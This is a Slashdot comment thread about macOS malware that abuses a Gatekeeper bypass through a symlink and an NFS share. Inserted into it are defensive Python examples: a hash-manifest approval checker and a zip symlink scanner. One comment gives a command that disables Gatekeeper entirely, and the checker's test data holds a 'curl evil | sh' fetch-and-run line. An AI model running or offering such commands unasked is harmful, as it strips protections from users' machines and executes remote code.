New Mac Malware Abuses Recently Disclosed Gatekeeper Zero-Day (zdnet.com)
puddingebola writes: In May, security researcher Filippo Cavallarin made public a vulnerability in macOS's Gatekeeper. The vulnerability can allow an attacker to use a symlink and an NFS server to bypass Gatekeeper's authentication and run malicious code. The malware has been named OSX/Linker and has been tied to the same group that operates the OSX/Surfbuyer adware. All macOS versions are affected, including the latest 10.14.5, and Apple has yet to release a patch to this day, a full month after Cavallarin's public disclosure.
Old versions? (Score:3)
My big question is whether there will be a patch available on older versions that are no longer supported. I have a couple of old MacBooks which haven't been supported in several years but are still functional. I wonder whether Apple will do the right thing. Probably not. I don't have the courage to throw away a working piece of equipment and buy something with sticky keys.
Re: Old versions? (Score:1)
I'm afraid you'll have to buy a new Mac to get support. Or do the right thing and put Linux on your Mac.
Re: (Score:2)
Good luck with that as the T2 Macs come off OS support. The chip doesn't allow Linux to see the internal SSD, even when set on "Low security". Your only real alternative will be Windows.
Re: Old versions? (Score:1)
Talk about simplicity. It would appear much much later in the process, if at all. Door is closing.
Re: Old versions? (Score:1)
I have a couple of 2008 maxed out iMacs and I'm loath to retire them.
Firewalled them from the external network. It's not perfect, but it keeps them running.
Rock solid stable, why should I mess with them?
Re: (Score:3)
Early-2008 or newer Mac Pro, iMac, or MacBook Pro:
MacPro3,1
MacPro4,1
iMac8,1
iMac9,1
iMac10,x
iMac11,x (systems with AMD Radeon HD 5xxx and 6xxx series GPUs will be almost unusable when running Mojave)
iMac12,x (systems with AMD Radeon HD 5xxx and 6xxx series GPUs will be almost unusable when running Mojave)
Re: (Score:2)
They just recently patched [apple.com] the entire discontinued AirPort base station line with updated firmware to address security issues, so I don't see why they wouldn't do this for macOS which is still an active product.
Just don't mount an NFS share (Score:2)
Or if you must, mount only the parts of it you trust.
How many people realistically mount NFS shares these days on Macs?
Even when you might, usually the server supports a protocol like SMB or Apple's file system.
Re: (Score:2)
- Early-2008 or newer Mac Pro, iMac, or MacBook Pro
- Late-2008 or newer MacBook Air or Aluminum Unibody MacBook:
- Early-2009 or newer Mac Mini or white MacBook:
- Early-2008 or newer Xserve:
If your Mac is old but not too old, you can still get unofficial support through our hero, DosDude1.
Want to bypass gatekeeper auth? Simple... (Score:2, Interesting)
Install from the command line. Gatekeeper is just a nanny program for the plebs - a security hole won't be relevant to power users anyway.
Re:Want to bypass gatekeeper auth? Simple... (Score:4, Insightful)
What does your incoherent mumbling "install from the commandine" even mean, in your head?
Re: Want to bypass gatekeeper auth? Simple... (Score:1)
What do you mean? Brew?
Re: (Score:2)
Yes, brew or just download a tgz, zip or binary direct using scp, curl or similar.
Re: (Score:2)
Why wouldn't it do it correctly? And if installs fail you sort them out. It's not rocket science.
Re: (Score:2)
As long as you're in Terminal,
sudo spctl --master-disable
OS/X default is to automatically mount NFS shares? (Score:3)
Does OS/X mount NFS shares automatically by default? Or is it that the installer application is doing that unbeknownst to the victim?
You have to mount it (Score:2)
You are right, you have to mount an NFS share. I'm not sure an application can even have permission to do that...
One other thought is, what is Gatekeeper even supposed to do about this? Scan the file and the remote end and see if it's dangerous - even though if it's not at any time later it could easily be replaced by something it is?
Maybe by default a good OS choice is to make a user enable cross-network symbolic links...
Re: (Score:2)
The ideal is that anything GateKeeper is executing gets checked for a signature, or if it doesn't have one, some manifest file with a hash of the executable is stored so if a user allowed "foo" to run, if "foo" gets changed, it would either deny executing, or tell the user.
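The manifest idea in the comment above, written out as an added example (this is not Apple's Gatekeeper code or anything from the original post): an allow-list keyed by name that records a SHA-256 of the executable when the user first approves it, and on every later launch reports whether the bytes still match. The names `record_approval`, `check_before_run` and the on-disk manifest format are assumptions of this example.

```python
import hashlib
import json
from pathlib import Path

# Verdicts returned by check_before_run()
ALLOWED = "allowed"    # hash matches what the user approved
CHANGED = "changed"    # same name, different bytes: deny or re-prompt
UNKNOWN = "unknown"    # never approved: treat like a fresh download


def digest(data: bytes) -> str:
    """SHA-256 of the executable's bytes, hex encoded."""
    return hashlib.sha256(data).hexdigest()


def record_approval(manifest: dict, name: str, data: bytes) -> str:
    """Store the hash of `data` under `name` when the user allows it to run."""
    manifest[name] = digest(data)
    return manifest[name]


def check_before_run(manifest: dict, name: str, data: bytes) -> str:
    """Compare the current bytes against the recorded approval."""
    expected = manifest.get(name)
    if expected is None:
        return UNKNOWN
    return ALLOWED if digest(data) == expected else CHANGED


# File-backed helpers (hypothetical layout: one JSON file per user).
def load_manifest(path: Path) -> dict:
    return json.loads(path.read_text()) if path.exists() else {}


def save_manifest(path: Path, manifest: dict) -> None:
    path.write_text(json.dumps(manifest, indent=2, sort_keys=True))


def check_file(manifest: dict, exe: Path) -> str:
    """Resolve symlinks first so the hash covers what would actually execute."""
    real = exe.resolve()
    return check_before_run(manifest, str(exe), real.read_bytes())


if __name__ == "__main__":
    # Constructed demo: approve "foo", then swap its contents behind the name.
    m = {}
    record_approval(m, "foo", b"#!/bin/sh\necho hello\n")
    print(check_before_run(m, "foo", b"#!/bin/sh\necho hello\n"))  # allowed
    print(check_before_run(m, "foo", b"#!/bin/sh\ncurl evil | sh\n"))  # changed
    print(check_before_run(m, "bar", b"anything"))  # unknown
```

The point of `check_file` resolving the path before hashing is exactly the case in this thread: a symlink whose name was approved but whose target lives on a share the user does not control would fail the hash comparison the moment the remote file changes.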
Re: (Score:2)
I get that the zip file creates a symlink to an NFS mounted share, but I don't understand how the NFS share got mounted in the first place.
I know for SMB and AFS shares, if you have an Alias on your desktop (or anywhere else) to a folder on a shared drive, the OS will automatically mount that shared drive when you double-click on the Alias. I suspect it works the same for NFS shares.
Thus, if your installer creates an alias called "catpic.jpg" on your desktop to an entity that exists on a shared drive, when you try to open the file the OS will auto-mount the share, and then load the file as appropriate. It's still in response to user interacti
Seems pretty roundabout (Score:2, Interesting)
So a user would have to download an app with a symlink in the package, where Gatekeeper would overlook a symbolic link to a network share....
How is it going to reach that network share? Does that have to be local?
Then the user also has to execute the symlink, why would they?
It's probably good to fix but I seriously doubt we'll see anyone affected.
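For the two comments above that ask how a symlink inside a downloaded archive ends up pointing at a network share, here is an added defensive example (not code from the original post, the researcher, or Apple): a scanner that walks a zip archive and flags symlink entries whose target is an absolute path or climbs out of the archive. It builds its own constructed sample archive in memory; the host name in the link target is a placeholder. The `/net` prefix is macOS's default automounter path (a fact about the platform, not something taken from this thread), which is why an absolute symlink target under it is worth flagging before the archive is unpacked.

```python
import io
import os
import stat
import zipfile


def build_sample_archive() -> bytes:
    """Constructed test data: one ordinary file plus one symlink entry.

    Zip stores a Unix symlink as an entry whose mode bits say S_IFLNK and
    whose file content is the link target.
    """
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("Cat.app/Contents/Info.plist", "<plist/>")
        link = zipfile.ZipInfo("Cat.app/Contents/MacOS/catpic.jpg")
        link.create_system = 3  # 3 = Unix, so the mode bits are meaningful
        link.external_attr = (stat.S_IFLNK | 0o777) << 16
        zf.writestr(link, "/net/EXAMPLE-HOST/share/payload")  # placeholder host
    return buf.getvalue()


def scan_archive(data: bytes) -> list:
    """Return one finding per symlink entry, marking suspicious targets."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for info in zf.infolist():
            mode = info.external_attr >> 16
            if not stat.S_ISLNK(mode):
                continue
            target = zf.read(info).decode("utf-8", "replace")
            reasons = []
            if os.path.isabs(target):
                reasons.append("absolute target")
            if ".." in target.split("/"):
                reasons.append("parent traversal")
            findings.append({
                "name": info.filename,
                "target": target,
                "suspicious": bool(reasons),
                "reasons": reasons,
            })
    return findings


def archive_is_clean(data: bytes) -> bool:
    """True when no symlink entry escapes the archive's own tree."""
    return not any(f["suspicious"] for f in scan_archive(data))


if __name__ == "__main__":
    for f in scan_archive(build_sample_archive()):
        flag = "SUSPICIOUS" if f["suspicious"] else "ok"
        print(f"{flag}: {f['name']} -> {f['target']} {f['reasons']}")
```

A relative symlink that stays inside the extracted folder produces a finding with `suspicious` set to false, so the check does not reject ordinary app bundles, which commonly contain internal symlinks such as `Current -> A` in framework directories.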
Temporary fix (Score:2)
It's not a zero-day (Score:4, Informative)
It was a zero-day, but now it is just a vulnerability, much in the way that today is tomorrow's yesterday.
Re: (Score:2)
What makes a vulnerability a "zero-day" is exploitation before a patch becomes available.